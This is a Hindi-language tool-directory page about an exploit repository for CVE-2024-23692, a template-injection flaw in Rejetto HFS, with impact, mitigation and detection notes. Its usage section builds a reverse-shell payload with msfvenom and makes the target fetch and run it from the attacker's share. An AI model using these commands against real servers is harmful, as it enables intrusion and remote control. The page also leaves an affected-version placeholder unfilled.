Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-23692 — Rejetto HFS (HTTP File Server) एक सरल वेब फ़ाइल सर्वर है जो नेटवर्क या इंटरनेट पर फ़ाइल साझाकरण की सुविधा प्रदान करता है। | Kitploit
उपकरण/GitHubGitHub/mr-r00t11/cve-2024-23692
पेलोड जनरेशनभेद्यता विश्लेषणशोषणशेलकोडवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरिमोट एक्सेस टूल
GitHubmr-r00t11/cve-2024-23692

CVE-2024-23692

Rejetto HFS (HTTP File Server) एक सरल वेब फ़ाइल सर्वर है जो नेटवर्क या इंटरनेट पर फ़ाइल साझाकरण की सुविधा प्रदान करता है।

रिपॉजिटरी देखें
22 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

Rejetto HFS (HTTP फ़ाइल सर्वर) CVE-2024-23692 भेद्यता


अवलोकन

Rejetto HFS (HTTP फ़ाइल सर्वर) एक सरल वेब फ़ाइल सर्वर है जो नेटवर्क या इंटरनेट पर फ़ाइल साझा करने की सुविधा प्रदान करता है। इसके उपयोग में आसानी और सरलता के बावजूद, एक गंभीर भेद्यता (CVE-2024-23692) खोजी गई है, जो सर्वर को हमलावरों के लिए निशाना बनाती है।


CVE-2024-23692: सर्वर-साइड टेम्पलेट इंजेक्शन (SSTI) भेद्यता


विवरण

CVE-2024-23692 Rejetto HFS में पहचानी गई एक सर्वर-साइड टेम्पलेट इंजेक्शन (SSTI) भेद्यता है। यह भेद्यता एक हमलावर को सर्वर पर दुर्भावनापूर्ण टेम्पलेट इंजेक्ट करने और निष्पादित करने की अनुमति देती है। यदि इसका शोषण किया जाता है, तो यह रिमोट कोड निष्पादन का कारण बन सकता है, जिससे पूरा सर्वर और उस पर होस्ट किया गया डेटा संभावित रूप से समझौता हो सकता है।


प्रभाव

इस भेद्यता का शोषण करने वाला हमलावर निम्न कार्य कर सकता है:

  • सर्वर पर मनमाना कोड निष्पादित कर सकता है
  • संवेदनशील डेटा तक अनधिकृत पहुंच प्राप्त कर सकता है
  • सर्वर की अखंडता और उपलब्धता से समझौता कर सकता है
  • समझौता किए गए सर्वर का उपयोग नेटवर्क के भीतर आगे के हमले शुरू करने के लिए कर सकता है

उपयोग

msfvenom में बनाए गए दुर्भावनापूर्ण बाइनरी का उपयोग करके एक शेल प्राप्त करें।

नोट: nc को सुनने के लिए छोड़ दें।

root@kitploit:~
# $ msfvenom -p windows/shell_reverse_tcp LHOST=192.168.198.128 LPORT=1234 -f exe > exploit.exe

$ bash CVE-2024-23692-V2.sh 192.168.198.130 80 //192.168.198.128/kali/exploit.exe

[Screenshot_1.png]

दूरस्थ रूप से एक कमांड चलाएँ।

root@kitploit:~
$ bash CVE-2024-23692-V2.sh 192.168.198.130 80 systeminfo

परिणाम प्रदर्शित होने में लगभग 15 सेकंड लग सकते हैं।

[Screenshot_2.png]


प्रभावित संस्करण

Rejetto HFS के सभी संस्करण, [यहाँ सबसे नवीनतम असुरक्षित संस्करण डालें] संस्करण तक, इस भेद्यता से प्रभावित हैं।


शमन

CVE-2024-23692 से उत्पन्न जोखिम को कम करने के लिए, उपयोगकर्ताओं को निम्नलिखित सलाह दी जाती है:

  • नवीनतम संस्करण में अपडेट करें: सुनिश्चित करें कि आप Rejetto HFS के उस संस्करण का उपयोग कर रहे हैं जिसमें यह भेद्यता पैच की गई है। नवीनतम अपडेट के लिए आधिकारिक Rejetto HFS वेबसाइट या रिपॉजिटरी देखें।
  • सुरक्षा सर्वोत्तम अभ्यास लागू करें: HFS सर्वर तक पहुंच केवल विश्वसनीय नेटवर्क और उपयोगकर्ताओं तक सीमित रखें। मजबूत प्रमाणीकरण और प्राधिकरण तंत्र का उपयोग करें।
  • निगरानी और ऑडिट करें: सर्वर की असामान्य गतिविधि के लिए नियमित रूप से निगरानी करें और शोषण के संकेतों के लिए लॉग की ऑडिट करें।

पहचान

यह निर्धारित करने के लिए कि आपका सर्वर समझौता किया गया है या नहीं, निम्नलिखित की तलाश करें:

  • सर्वर से उत्पन्न होने वाला असामान्य नेटवर्क ट्रैफ़िक
  • सर्वर पर अप्रत्याशित फ़ाइलें या प्रक्रियाएँ
  • सर्वर कॉन्फ़िगरेशन या डेटा में अनधिकृत परिवर्तन

रिपोर्टिंग और सहायता

आगे की सहायता और समर्थन के लिए, Rejetto HFS सामुदायिक फ़ोरम या आधिकारिक समर्थन चैनलों का संदर्भ लें।


संसाधन

  • Rejetto HFS आधिकारिक वेबसाइट
  • CVE-2024-23692 विवरण

लाइसेंस

यह प्रोजेक्ट MIT लाइसेंस के अंतर्गत लाइसेंस प्राप्त है - विवरण के लिए LICENSE फ़ाइल देखें।


टूल डाउनलोड करें